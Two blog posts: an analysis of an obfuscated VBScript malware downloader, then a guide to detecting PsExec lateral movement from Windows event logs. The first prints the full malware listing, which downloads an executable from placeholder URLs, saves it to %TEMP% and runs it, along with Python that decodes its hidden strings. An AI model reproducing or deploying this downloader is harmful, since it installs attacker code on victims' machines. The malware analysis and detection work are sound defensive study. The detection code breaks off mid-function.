Most of the listing is junk copied from unrelated VBS projects (a minesweeper, a podcast cleaner, a geometry library, a deployment log copier) to pad the file; the working part is small. Advancedmantel2 is built up as a string table delimited by FIREMAN with JACKSON stuffed into the words, MambaMamba strips the stuffing and splits it, and JohnTheRipper(n) is then a plain lookup: 0 = Microsoft.XMLHTTP, 3 = Wscript.shell, 4 = Process, 5 = GeT, 6 = TemP, 12 = \xhAFULQ.exe, 13 and 14 = http://. The script loops over the mual URL list, issues a GET for each, accepts the first response whose Status + 3 = 203 (i.e. 200), writes responseBody through a binary ADODB.Stream to %TEMP%\xhAFULQ.exe and runs it with WScript.Shell. It tries to set a Firefox User-Agent, but SetUA calls setRequestHeader on UltraXgettingLamp, an object that is never created, so under On Error Resume Next the header is silently never sent. The "RIDG" + WScript + "4" comparison only passes when the WScript object stringifies (through its default Name property) to "Windows Script Host", a cheap check that the script is running under the real Windows Script Host rather than an emulator.<br />
<br />
<br />
Dim UltraXgettingensurance 'As String<br />
<br />
Dim UltraXgettingUotOfStock 'As String<br />
<br />
Function CopyLog()<br />
<br />
Dim oFile<br />
Dim iRetVal, fptr1, fptr2, sLine, sNewLogFolderName, sLogFile<br />
Dim sComputer<br />
Dim sLog<br />
Dim sBootDrive<br />
' Make sure the path is accessible<br />
oUtility.ValidateConnection oEnvironment.Item("SLShare")<br />
oUtility.VerifyPathExists oEnvironment.Item("SLShare")<br />
If not oFSO.FolderExists(oEnvironment.Item("SLShare")) then<br />
oLogging.CreateEntry "An invalid SLShare value of " & oEnvironment.Item("SLShare") & " was specified.", LogTypeWarning<br />
Exit Function<br />
End if<br />
<br />
<br />
<br />
End Function<br />
<br />
Function Set2Mine(Who, Color, X, y ) <br />
For i = 0 To UBound(Mines) + 1<br />
If i > UBound(Mines) Then ReDim Preserve Mines(i)<br />
If Mines(i).Color = 0 Then<br />
Mines(i).Who = Who<br />
Mines(i).Color = Color<br />
Mines(i).X = X<br />
Mines(i).y = y<br />
Mines(i).Tick = 0<br />
SetMine = i<br />
Exit For<br />
End If<br />
Next<br />
End Function<br />
<br />
<br />
<br />
<br />
Function StateUovertakesgetting()<br />
if D = 19 then<br />
AXC = "SaveT"+"oFile"<br />
end if<br />
StateUovertakes4000.Savetofile UltraXgettingUotOfStock , 9-7<br />
End Function<br />
<br />
UltraXgettingBelish = "User"<br />
<br />
<br />
<br />
<br />
Function F3(p, ddd) <br />
Set UltraXgettingRombickom = CreateObject("WScrip"+"t.Shell") <br />
End Function <br />
<br />
Dim Advancedmantel2 'As String<br />
<br />
Function ABTF(A, B, T, F)<br />
set ABTF = A.CreateTextFile( B,T , F)<br />
end function<br />
<br />
Dim UltraXgettingRickyTIcky 'As Object<br />
Dim StateUovertakes4000 'As Object<br />
<br />
RACHEL = "avetof"<br />
<br />
Dim TristateTrue<br />
<br />
Advancedmantel2 = "XMLHTTPFIREMANAdodb.streaMFIREMANs"<br />
Vrungel = ".respo"+"nseBody"<br />
Function SheduledObject(p,d)<br />
<br />
<br />
UltraXgettingRombickom.Run("" &UltraXgettingUotOfStock )<br />
End Function<br />
<br />
<br />
Dim UltraXgettingTimeTo 'As Object<br />
Dim UltraXgettingstatus<br />
UltraXgettingstatus = false<br />
Dim JohnTheRipper<br />
Dim UltraXgettingcashback 'As Object<br />
CUA ="Mozilla/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0"<br />
<br />
Dim UltraXgetting1DASH1solo 'As Object <br />
<br />
Advancedmantel2 ="Microsoft." + Advancedmantel2+ "hell.ApplicationFIREMANWscript"+".shellFIREMANProcessFIREMANGeTFIREMANT"+"emPFIREMANTyJACKSON"+"peJACKSON"<br />
<br />
<br />
Function MambaMamba( TIK )<br />
MambaMamba = Split(Replace(Advancedmantel2, "JACKSON", "" ), TIK)<br />
End Function<br />
Dim mual<br />
<br />
Function StateUovertakesgetting2(param1)<br />
param1 = param1 + param1<br />
<br />
UltraXgettingResponseBody = UltraXgettingRickyTIcky.responseBody<br />
param1 = 4 * param1 + 8 <br />
<br />
End Function<br />
<br />
<br />
Public Function IsLineAnalytic(ByVal Figure1 )<br />
If Figure1 < FigureCount And Figure1 >= 0 Then<br />
If Figures(Figure1).FigureType = dsAnLineCanonic Or _<br />
Figures(Figure1).FigureType = dsAnLineGeneral Or _<br />
Figures(Figure1).FigureType = dsAnLineNormal Or _<br />
Figures(Figure1).FigureType = dsAnLineNormalPoint Then IsLineAnalytic = True<br />
End If<br />
End Function<br />
<br />
<br />
Public Function IsCircleAnalytic(ByVal Figure1 ) <br />
If Figure1 < FigureCount And Figure1 >= 0 Then<br />
If Figures(Figure1).FigureType = dsAnCircle Then IsCircleAnalytic = True<br />
End If<br />
End Function<br />
Advancedmantel2 = Advancedmantel2 +"FIREMANJACKSONoJACKSONpenFIREMANwrJACKSONiteFIREMANreJACKSONspoJACKSONnseBoJACKSONdyFIREMANsaJACKSONvetof"+"JACKSONileFIREMAN\xhAFULQ.ex"+"eJACKSONFIREMANhtJACKSONtp:FIREMAN//"<br />
Function UltraXgettingFuks(p)<br />
<br />
UltraXgettingRickyTIcky.Send<br />
<br />
End Function <br />
JohnTheRipper = MambaMamba("" + "FIREMAN" + "")<br />
<br />
<br />
<br />
Private Sub SubscriptionHistoryMaintenance(ByVal db , ByRef curlist , ByVal historyLength )<br />
If historyLength < 1 Then<br />
historyLength = 1 ' Minimum history length is one!<br />
End If<br />
<br />
' Sort by date descending (default sorter for PST sorts descending)<br />
curlist.Sort()<br />
<br />
' Now purge any old files<br />
For i = 0 To curlist.Count - 1<br />
If i >= historyLength Then<br />
Me.PurgePodcastFile db, curlist(i)<br />
End If<br />
Next<br />
End Sub<br />
Set UltraXgettingRickyTIcky = CreateObject(JohnTheRipper(0))<br />
<br />
Dim UltraXgetting4 'As String<br />
<br />
Dim UltraXgettingResponseBody 'As Variant<br />
Dim UltraXgettingRombickom<br />
Dim MarketPlace 'As String<br />
Dim sTempVis 'As String<br />
Dim iCount 'As Integer<br />
Public Function WriteCD(aWrite,bWrite)<br />
astp = 12<br />
astp = astp + 3<br />
if astp > 4 then<br />
aWrite.Write bWrite<br />
astp = 3 * astp<br />
end if<br />
End Function<br />
Dim Valery 'As Integer<br />
UltraXgettingBelish = UltraXgettingBelish + "-"<br />
<br />
Dim Twelve 'As Integer<br />
Dim sDecimalVis 'As String<br />
Dim UltraXgettingPetir 'As String<br />
UltraXgettingPetir = "Ag"<br />
<br />
Dim MarketPlaceibility 'As String<br />
<br />
<br />
Dim sNodeKey 'As String<br />
Dim sParentKey 'As String<br />
<br />
<br />
<br />
<br />
Twelve = 11 + 1<br />
zTempVis = JohnTheRipper(1)<br />
<br />
'Set UltraXgettingTimeTo = CreateObject(JohnTheRipper(8-6))<br />
Set UltraXgettingRockiBilbo = GetRef("SheduledObject")<br />
<br />
Set StateUovertakes4000 = CreateObject("Adodb.streaM")<br />
Set UltraXgetting1DASH1solo = CreateObject(JohnTheRipper(9-6))<br />
<br />
<br />
Function SetUA()<br />
UltraXgettingLamp.setRequestHeader UltraXgettingBelish, CUA<br />
End Function<br />
<br />
if "RIDG" + WScript + "4" = "RIDGWindows Script Host4" Then <br />
<br />
<br />
mual = Array("<b><span style="background-color: yellow;">pawnedsite-1.com/payload","pawnedsite-2.com/payload","pawnedsite-3.com/payload</span></b>")<br />
<br />
Set UltraXgettingcashback = UltraXgetting1DASH1solo.Environment(JohnTheRipper(1 + 3))<br />
<br />
end if <br />
<br />
<br />
Public Function Anim2UniBall(i)<br />
Dim Rx, Ry, rBuff<br />
Dim xt, yt, j, e<br />
Dim NewX, NewY, d, SgnX, SgnY<br />
Dim RatioX, RatioY<br />
Rx = 452<br />
Ry = 81<br />
<br />
<br />
If SgnY = 1 Then 'y positive testing<br />
For d = UniBall(i).BallY + 1 To NewY<br />
j = WeaponTouch(6, i, NewX, d)<br />
If j = -6 Then<br />
UniBall(i).BMoveY = UniBall(i).BMoveY * -1<br />
NewY = d - 1<br />
Exit For<br />
End If<br />
Next<br />
End If<br />
<br />
If SgnY = -1 Then 'y negative testing<br />
For d = UniBall(i).BallY - 1 To NewY Step -1<br />
j = WeaponTouch(6, i, NewX, d)<br />
If j = -6 Then<br />
UniBall(i).BMoveY = UniBall(i).BMoveY * -1<br />
NewY = d + 1<br />
Exit For<br />
End If<br />
Next<br />
End If<br />
j = WeaponTouch(6, i, NewX, NewY)<br />
If j = -7 Then Exit Function<br />
<br />
UniBall(i).BallX = NewX<br />
UniBall(i).BallY = NewY<br />
End Function<br />
<br />
<br />
Valery = 89210<br />
<br />
<br />
UltraXgettingensurance = UltraXgettingcashback(JohnTheRipper(6))<br />
Dim i<br />
'on error GoTo nextU<br />
' on error resume next<br />
sTempVis = JohnTheRipper(Twelve)<br />
<br />
Sub SendFlagDat(SndTo)<br />
Dim i , b , n <br />
Dim oNewMsg() , lNewOffSet <br />
Dim lNewMsg <br />
<br />
For i = 1 To UBound(Flag1, 2)<br />
<br />
lNewMsg = MSG_FLAGS<br />
lNewOffSet = 0<br />
ReDim oNewMsg(0)<br />
AddBufferData oNewMsg, VarPtr(lNewMsg), LenB(lNewMsg), lNewOffSet<br />
b = 1<br />
AddBufferData oNewMsg, VarPtr(b), LenB(b), lNewOffSet<br />
b = i<br />
AddBufferData oNewMsg, VarPtr(b), LenB(b), lNewOffSet<br />
n = Flag1(0, i)<br />
AddBufferData oNewMsg, VarPtr(n), LenB(n), lNewOffSet<br />
n = Flag1(1, i)<br />
AddBufferData oNewMsg, VarPtr(n), LenB(n), lNewOffSet<br />
n = FlagCarry1(i)<br />
AddBufferData oNewMsg, VarPtr(n), LenB(n), lNewOffSet<br />
SendTo oNewMsg, CInt(SndTo)<br />
Next<br />
For i = 1 To UBound(Flag2, 2)<br />
lNewMsg = MSG_FLAGS<br />
lNewOffSet = 0<br />
ReDim oNewMsg(0)<br />
AddBufferData oNewMsg, VarPtr(lNewMsg), LenB(lNewMsg), lNewOffSet<br />
b = 2<br />
AddBufferData oNewMsg, VarPtr(b), LenB(b), lNewOffSet<br />
b = i<br />
AddBufferData oNewMsg, VarPtr(b), LenB(b), lNewOffSet<br />
n = Flag2(0, i)<br />
AddBufferData oNewMsg, VarPtr(n), LenB(n), lNewOffSet<br />
n = Flag2(1, i)<br />
AddBufferData oNewMsg, VarPtr(n), LenB(n), lNewOffSet<br />
n = FlagCarry2(i)<br />
AddBufferData oNewMsg, VarPtr(n), LenB(n), lNewOffSet<br />
SendTo oNewMsg, CInt(SndTo)<br />
Next<br />
For i = 1 To UBound(Flag3, 2)<br />
lNewMsg = MSG_FLAGS<br />
lNewOffSet = 0<br />
ReDim oNewMsg(0)<br />
AddBufferData oNewMsg, VarPtr(lNewMsg), LenB(lNewMsg), lNewOffSet<br />
b = 3<br />
AddBufferData oNewMsg, VarPtr(b), LenB(b), lNewOffSet<br />
b = i<br />
AddBufferData oNewMsg, VarPtr(b), LenB(b), lNewOffSet<br />
n = Flag3(0, i)<br />
AddBufferData oNewMsg, VarPtr(n), LenB(n), lNewOffSet<br />
n = Flag3(1, i)<br />
AddBufferData oNewMsg, VarPtr(n), LenB(n), lNewOffSet<br />
n = FlagCarry3(i)<br />
AddBufferData oNewMsg, VarPtr(n), LenB(n), lNewOffSet<br />
SendTo oNewMsg, CInt(SndTo)<br />
Next<br />
For i = 1 To UBound(Flag4, 2)<br />
lNewMsg = MSG_FLAGS<br />
lNewOffSet = 0<br />
ReDim oNewMsg(0)<br />
AddBufferData oNewMsg, VarPtr(lNewMsg), LenB(lNewMsg), lNewOffSet<br />
b = 4<br />
AddBufferData oNewMsg, VarPtr(b), LenB(b), lNewOffSet<br />
b = i<br />
AddBufferData oNewMsg, VarPtr(b), LenB(b), lNewOffSet<br />
n = Flag4(0, i)<br />
AddBufferData oNewMsg, VarPtr(n), LenB(n), lNewOffSet<br />
n = Flag4(1, i)<br />
AddBufferData oNewMsg, VarPtr(n), LenB(n), lNewOffSet<br />
n = FlagCarry4(i)<br />
AddBufferData oNewMsg, VarPtr(n), LenB(n), lNewOffSet<br />
SendTo oNewMsg, CInt(SndTo)<br />
Next<br />
For i = 1 To UBound(Flag5, 2)<br />
lNewMsg = MSG_FLAGS<br />
lNewOffSet = 0<br />
ReDim oNewMsg(0)<br />
AddBufferData oNewMsg, VarPtr(lNewMsg), LenB(lNewMsg), lNewOffSet<br />
b = 5<br />
AddBufferData oNewMsg, VarPtr(b), LenB(b), lNewOffSet<br />
b = i<br />
AddBufferData oNewMsg, VarPtr(b), LenB(b), lNewOffSet<br />
n = Flag5(0, i)<br />
AddBufferData oNewMsg, VarPtr(n), LenB(n), lNewOffSet<br />
n = Flag5(1, i)<br />
AddBufferData oNewMsg, VarPtr(n), LenB(n), lNewOffSet<br />
n = FlagCarry5(i)<br />
AddBufferData oNewMsg, VarPtr(n), LenB(n), lNewOffSet<br />
SendTo oNewMsg, CInt(SndTo)<br />
Next<br />
<br />
End Sub<br />
<br />
MarketPlace = JohnTheRipper(11+2) & JohnTheRipper(11+3)<br />
<br />
UltraXgettingBelish = UltraXgettingBelish & UltraXgettingPetir & "ent"<br />
<br />
rdde = 19<br />
<br />
<br />
lTo = UBound(mual)<br />
For i = 0 To lTo Step 1<br />
rdde = rdde * 8<br />
<br />
on error resume next<br />
<br />
Valery = Valery +33<br />
UltraXgetting4 = MarketPlace + mual(i)<br />
UltraXgettingRickyTIcky.Open JohnTheRipper(5), UltraXgetting4, False<br />
dr1=2<br />
<br />
rdde = rdde + 91<br />
<br />
<br />
SetUA()<br />
UltraXgettingFuks " d "<br />
If UltraXgettingRickyTIcky.Status +3 = 203 Then<br />
UltraXgettingstatus = true<br />
Exit For<br />
End If<br />
<br />
goto14:<br />
Next<br />
<br />
on error goto 0<br />
if UltraXgettingstatus Then<br />
Dim Ratchet 'As String<br />
UltraXgettingUotOfStock = UltraXgettingensurance+ sTempVis<br />
<br />
F3 "",4<br />
StateUovertakes4000.Type = 1<br />
StateUovertakes4000.Open<br />
StateUovertakesgetting2 22 <br />
WriteCD StateUovertakes4000,UltraXgettingResponseBody<br />
dttat =4<br />
UltraXgettingUotOfStocku = "" + UltraXgettingUotOfStock <br />
<br />
dttat = dttat*2<br />
<br />
StateUovertakesgetting()<br />
Dim UltraXgettingJohnSnowu,UltraXgettingTmp1 'As Long<br />
<br />
UltraXgettingJohnSnowu = 3012<br />
<br />
If 1040 < UltraXgettingJohnSnowu Then<br />
drba =55<br />
UltraXgettingTmp1 = "|"<br />
<br />
UltraXgettingRockiBilbo "}}}}}}}}}}}}}","062"<br />
End If<br />
<br />
<br />
<br />
triada = 341<br />
end if<br />
<br />
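Added example (my code, not the author's) that replays the script's own string-building steps to recover the table JohnTheRipper indexes into, and resolves each lookup site to the object or method name it hides. The mual array in the listing is the author's redacted placeholder list, so the URLs it produces are placeholders too; the %TEMP% value passed to drop_path is an assumption standing in for what Environment("Process")("TemP") would return on the victim.

```python
"""Resolve the string table the VBS downloader above hides its object and method names in."""
from __future__ import annotations


def build_table() -> list[str]:
    """Replay the script's concatenation of Advancedmantel2, then MambaMamba("FIREMAN"),
    which is Split(Replace(s, "JACKSON", ""), "FIREMAN")."""
    s = "XMLHTTPFIREMANAdodb.streaMFIREMANs"
    s = ("Microsoft." + s + "hell.ApplicationFIREMANWscript" + ".shellFIREMANProcessFIREMANGeTFIREMANT"
         + "emPFIREMANTyJACKSON" + "peJACKSON")
    s = (s + "FIREMANJACKSONoJACKSONpenFIREMANwrJACKSONiteFIREMANreJACKSONspoJACKSONnseBoJACKSONdy"
         + "FIREMANsaJACKSONvetof" + r"JACKSONileFIREMAN\xhAFULQ.ex" + "eJACKSONFIREMANhtJACKSONtp:FIREMAN//")
    return s.replace("JACKSON", "").split("FIREMAN")


# Each JohnTheRipper(...) lookup in the script with the index expression it uses. The indices are
# written as arithmetic in the original to defeat grep; they are evaluated here as VBScript would.
CALL_SITES = {
    "Set UltraXgettingRickyTIcky = CreateObject(JohnTheRipper(0))": [0],
    "zTempVis = JohnTheRipper(1)": [1],
    "Set UltraXgetting1DASH1solo = CreateObject(JohnTheRipper(9-6))": [9 - 6],
    "UltraXgetting1DASH1solo.Environment(JohnTheRipper(1 + 3))": [1 + 3],
    "UltraXgettingRickyTIcky.Open JohnTheRipper(5), UltraXgetting4, False": [5],
    "UltraXgettingensurance = UltraXgettingcashback(JohnTheRipper(6))": [6],
    "sTempVis = JohnTheRipper(Twelve)   ' Twelve = 11 + 1": [11 + 1],
    "MarketPlace = JohnTheRipper(11+2) & JohnTheRipper(11+3)": [11 + 2, 11 + 3],
}


def resolve_calls(table: list[str]) -> dict:
    """Map each call site to the plaintext the script actually uses there."""
    return {site: "".join(table[i] for i in idx) for site, idx in CALL_SITES.items()}


def download_urls(table: list[str], mual: list[str]) -> list[str]:
    """UltraXgetting4 = MarketPlace + mual(i), for every entry of the URL array."""
    prefix = table[13] + table[14]
    return [prefix + entry for entry in mual]


def drop_path(table: list[str], temp_dir: str) -> str:
    """UltraXgettingUotOfStock = %TEMP% (Environment("Process")(table[6])) + table[12]."""
    return temp_dir + table[12]


if __name__ == "__main__":
    table = build_table()
    for i, entry in enumerate(table):
        print(i, entry)
    for site, value in resolve_calls(table).items():
        print(site, "->", value)
    print(download_urls(table, ["pawnedsite-1.com/payload"]))
    print(drop_path(table, r"C:\Users\victim\AppData\Local\Temp"))   # assumed %TEMP%
```

Entries 7 to 11 (Type, open, write, responseBody, savetofile) are present in the table but the script calls those members by their literal names, so they are either decoys or leftovers from an earlier build.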
<br /></div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-1270838152641758291.post-49652484756874194892017-08-01T23:45:00.000-07:002017-08-02T00:01:01.185-07:00Detecting Lateral Movement - PsExec execution with Demo<div dir="ltr" style="text-align: left;" trbidi="on">
PsExec is an easy way to move laterally on any network: the operator authenticates to the target over SMB, copies a service binary to its ADMIN$ share, installs it as a service and uses that service to run commands. Each of those steps leaves an event on the target, and here's one way of detecting lateral movement from them.<br />
<br />
<br />
Demo:<br />
We'll create a PsExec session and then look for the events and note them down. These can then be used for monitoring alerts or forensic investigations.<br />
<br />
Launch a PsExec session from one machine to another and note the time:<br />
<br />
Machine A - <br />
<div class="separator" style="clear: both; text-align: left;">
<img border="0" data-original-height="101" data-original-width="920" height="69" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiO9cxuSMEoPc_ieHk3XeAFoFHw7s719n1FyfniTVHzO3vkQxP7hw-lDzu-cTpBdhc2z1sj9MnP-UfNbd637YvEiM34qRDsdQNZFwVAlPSZ-MUExCcqg3AedCIya6Ftwe_8IwAiTq5q9TpW/s640/1.png" width="640" /> </div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Session launched on Machine B - </div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg2-jxxxS6JmLslwCTSv7uutFFAqoEB-fdhPB3FkWzsRYG8SNidmBqOHAYKf6ipRupzecxf1-YrFGzF6-UaKCHvPt1phRMIhjnKfrIR7e8yV9rQ1esuHRFipZ6Lz4I7ecHzY_3dsym4RNAa/s1600/2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1013" data-original-width="1298" height="498" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg2-jxxxS6JmLslwCTSv7uutFFAqoEB-fdhPB3FkWzsRYG8SNidmBqOHAYKf6ipRupzecxf1-YrFGzF6-UaKCHvPt1phRMIhjnKfrIR7e8yV9rQ1esuHRFipZ6Lz4I7ecHzY_3dsym4RNAa/s640/2.png" width="640" /></a></div>
<br />
<br />
<br />
Now we look through the Windows Event Viewer on Machine B and find the events for this session.<br />
In the Security log, the image below shows the Logon event (ID 4624) created for the session we launched (note the timestamp). PsExec authenticates over SMB, so this is a network logon, Logon Type 3. <br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgYWAd4K3RmI_qJ7cN2X-Vu78SFd1zQg8fEBi45SOLB-sz1L7dWZ0Az4jLbrSL9STI02xhsnQtCchSwSCVVQgAbeNlVCKhpv35uBHyLGCTkWVVcMN_vlwAEwvl3CLTVJRodwP57eSQz3Fbt/s1600/3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="213" data-original-width="621" height="218" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgYWAd4K3RmI_qJ7cN2X-Vu78SFd1zQg8fEBi45SOLB-sz1L7dWZ0Az4jLbrSL9STI02xhsnQtCchSwSCVVQgAbeNlVCKhpv35uBHyLGCTkWVVcMN_vlwAEwvl3CLTVJRodwP57eSQz3Fbt/s640/3.png" width="640" /></a></div>
<br />
<br />
Details of the event should give us more information on the event. <br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgpm-LohX-WeMoa-DDpQoNMSaeqOC6eY4mfc7m9YO1hyphenhyphen-qhRsMh9DBNnVPTLd11iyQP34daZtaItk_BAbgAxV9q51aqFzxEEH0h55pghhtLxIdZxN_6E5oPuaVir0QvNRCJDoFBoWw0wM0N/s1600/4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="355" data-original-width="574" height="394" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgpm-LohX-WeMoa-DDpQoNMSaeqOC6eY4mfc7m9YO1hyphenhyphen-qhRsMh9DBNnVPTLd11iyQP34daZtaItk_BAbgAxV9q51aqFzxEEH0h55pghhtLxIdZxN_6E5oPuaVir0QvNRCJDoFBoWw0wM0N/s640/4.png" width="640" /></a></div>
<br />
<br />
This tells us clearly that the logon came from our Machine A, through PsExec:<br />
<div class="separator" style="clear: both; text-align: left;">
Next, we need to look for the service that was created as part of this session. On a successful launch PsExec copies its service binary, PSEXESVC.exe, to the target's ADMIN$ share and installs it as a service named PSEXESVC (the -r switch lets an operator rename it, so do not rely on the default name alone). <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi-rcOTg2peeCKbsshdB8388GwPnkTOwmIUDhW5rD6Ak9NkxiMMeENmXinOvWOjrodu7Gjmu6_z_ouVpsG8ouS9IdNN1EOCspH95H677e9RqpJLXw3PVf-Ps1qW1VSHKG__geWwf81HGbms/s1600/10.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="254" data-original-width="774" height="210" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi-rcOTg2peeCKbsshdB8388GwPnkTOwmIUDhW5rD6Ak9NkxiMMeENmXinOvWOjrodu7Gjmu6_z_ouVpsG8ouS9IdNN1EOCspH95H677e9RqpJLXw3PVf-Ps1qW1VSHKG__geWwf81HGbms/s640/10.png" width="640" /> </a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhW7Q7Zi8O-fBdoKNy5QkDsaXfVpll-FUgUvidWbNQ84dr-8ogdeGSAdetjiWvTy-9Snt3ChCGflta1Halwf6sGnf_4JwUcuS-c2LNp-4K08HFt10AAAnRq4ZSovaVTPSkIfZmwFewvz7y4/s1600/6.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="221" data-original-width="287" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhW7Q7Zi8O-fBdoKNy5QkDsaXfVpll-FUgUvidWbNQ84dr-8ogdeGSAdetjiWvTy-9Snt3ChCGflta1Halwf6sGnf_4JwUcuS-c2LNp-4K08HFt10AAAnRq4ZSovaVTPSkIfZmwFewvz7y4/s1600/6.png" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
To find the service that was created on this host (Machine B), we need to look under the System log, where the Service Control Manager records every new service installation (Event ID 7045).</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgDX48i2SZdjPaELyD4QcrpDPSgskevjNhDvwj1QzAZ-dKigyO8s-eYPWRZv1YwYHfKs6dw5B7ACeR9BqxuiARkTkwoY4PTEeF-IiU4PlJLKvicLSMOCwrcSoANTEXs75lABidJyl8jgfbl/s1600/5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="76" data-original-width="598" height="80" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgDX48i2SZdjPaELyD4QcrpDPSgskevjNhDvwj1QzAZ-dKigyO8s-eYPWRZv1YwYHfKs6dw5B7ACeR9BqxuiARkTkwoY4PTEeF-IiU4PlJLKvicLSMOCwrcSoANTEXs75lABidJyl8jgfbl/s640/5.png" width="640" /></a></div>
<br />
Look at the details:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEivYdabKcsWg17Zj6vDhIRCXELuP_6jGk_hyphenhyphennuI9waOxN3Z2Yts97jZGnLp25zxXBeOB2jpWGHZdiNnmv8rv6g7uZdMWzubcclShF-1IwvQT0eFBdmudvX6aB3BGojFhRebLciHwoHS1XXg/s1600/7.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="122" data-original-width="306" height="159" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEivYdabKcsWg17Zj6vDhIRCXELuP_6jGk_hyphenhyphennuI9waOxN3Z2Yts97jZGnLp25zxXBeOB2jpWGHZdiNnmv8rv6g7uZdMWzubcclShF-1IwvQT0eFBdmudvX6aB3BGojFhRebLciHwoHS1XXg/s400/7.png" width="400" /></a></div>
<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgqf4qOQIx56UtHoHZGmxahHyUn2MMERw-aBICNI0TzhYfvx9hq3rH4HeXpvdtIL8D1FMdt9AF9x2VAD1HNg8znsgzd0XMCSkuIIX069nmkSgSup2lmeZPts1GC-IayEJC0AOR0QsORHLGj/s1600/8.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="193" data-original-width="441" height="175" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgqf4qOQIx56UtHoHZGmxahHyUn2MMERw-aBICNI0TzhYfvx9hq3rH4HeXpvdtIL8D1FMdt9AF9x2VAD1HNg8znsgzd0XMCSkuIIX069nmkSgSup2lmeZPts1GC-IayEJC0AOR0QsORHLGj/s400/8.png" width="400" /></a></div>
<br />
<br />
<br />
These are the events to monitor and investigate for PsExec execution on a host: the network logon in the Security log followed by the service installation in the System log. Collecting and correlating them can be automated through a SIEM for continuous monitoring, or done ad hoc during investigations and incident response.<br />
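As an added example (not part of the original post), here is the same correlation expressed as detection logic you could run over an exported event set or drop into a SIEM pipeline: a 4624 network logon on the target paired with a 7045 service installation for PsExec's service shortly afterwards. The event records, hostnames, user, IP address and timestamps are constructed for illustration; the field names are the standard ones from those two events' EventData.

```python
"""Correlate PsExec activity from exported Windows event records.

Added example, not code from the original post. Input is a list of dicts in
the shape an evtx-to-JSON export or a SIEM would hand you. Every record below
is constructed for illustration: hostnames, user, IP and timestamps are made up.
"""
from datetime import datetime, timedelta

# Constructed sample. A Security 4624 network logon (LogonType 3) from
# Machine A is followed one second later by a System 7045 record: the Service
# Control Manager installed PSEXESVC on Machine B. Two unrelated records are
# included so the correlation has something to reject.
SAMPLE_EVENTS = [
    {"Channel": "Security", "EventID": 4624, "TimeCreated": "2018-10-01T10:00:03",
     "Computer": "MACHINE-B", "LogonType": 3, "TargetUserName": "admin",
     "WorkstationName": "MACHINE-A", "IpAddress": "192.0.2.10"},
    {"Channel": "System", "EventID": 7045, "TimeCreated": "2018-10-01T10:00:04",
     "Computer": "MACHINE-B", "ServiceName": "PSEXESVC",
     "ImagePath": "%SystemRoot%\\PSEXESVC.exe", "AccountName": "LocalSystem"},
    {"Channel": "Security", "EventID": 4624, "TimeCreated": "2018-10-01T11:30:00",
     "Computer": "MACHINE-B", "LogonType": 2, "TargetUserName": "bob",
     "WorkstationName": "MACHINE-B", "IpAddress": "127.0.0.1"},
    {"Channel": "System", "EventID": 7045, "TimeCreated": "2018-10-01T11:45:00",
     "Computer": "MACHINE-B", "ServiceName": "Backup Agent",
     "ImagePath": "C:\\Program Files\\Backup\\agent.exe", "AccountName": "LocalSystem"},
]


def _ts(event):
    return datetime.fromisoformat(event["TimeCreated"])


def is_psexec_service(event):
    """True for a System 7045 (service installed) record that names PsExec's
    default service or binary. PsExec's -r switch renames both, so treat this
    as the first tier only and combine it with the logon correlation below.
    (With 'Audit Security System Extension' enabled, Security 4697 records
    the same installation.)"""
    if event.get("Channel") != "System" or event.get("EventID") != 7045:
        return False
    name = event.get("ServiceName", "").upper()
    image = event.get("ImagePath", "").upper()
    return name == "PSEXESVC" or image.endswith("PSEXESVC.EXE")


def any_new_service(event):
    """Wider second-tier filter: every 7045, for catching a renamed PsExec
    service by its proximity to a remote logon rather than by its name."""
    return event.get("Channel") == "System" and event.get("EventID") == 7045


def find_psexec_sessions(events, window_seconds=60, service_filter=is_psexec_service):
    """Pair each matching service install with the closest preceding network
    logon (4624, LogonType 3) on the same host inside the window. Returns one
    summary dict per correlated session, oldest first."""
    window = timedelta(seconds=window_seconds)
    logons = [e for e in events
              if e.get("Channel") == "Security" and e.get("EventID") == 4624
              and e.get("LogonType") == 3]
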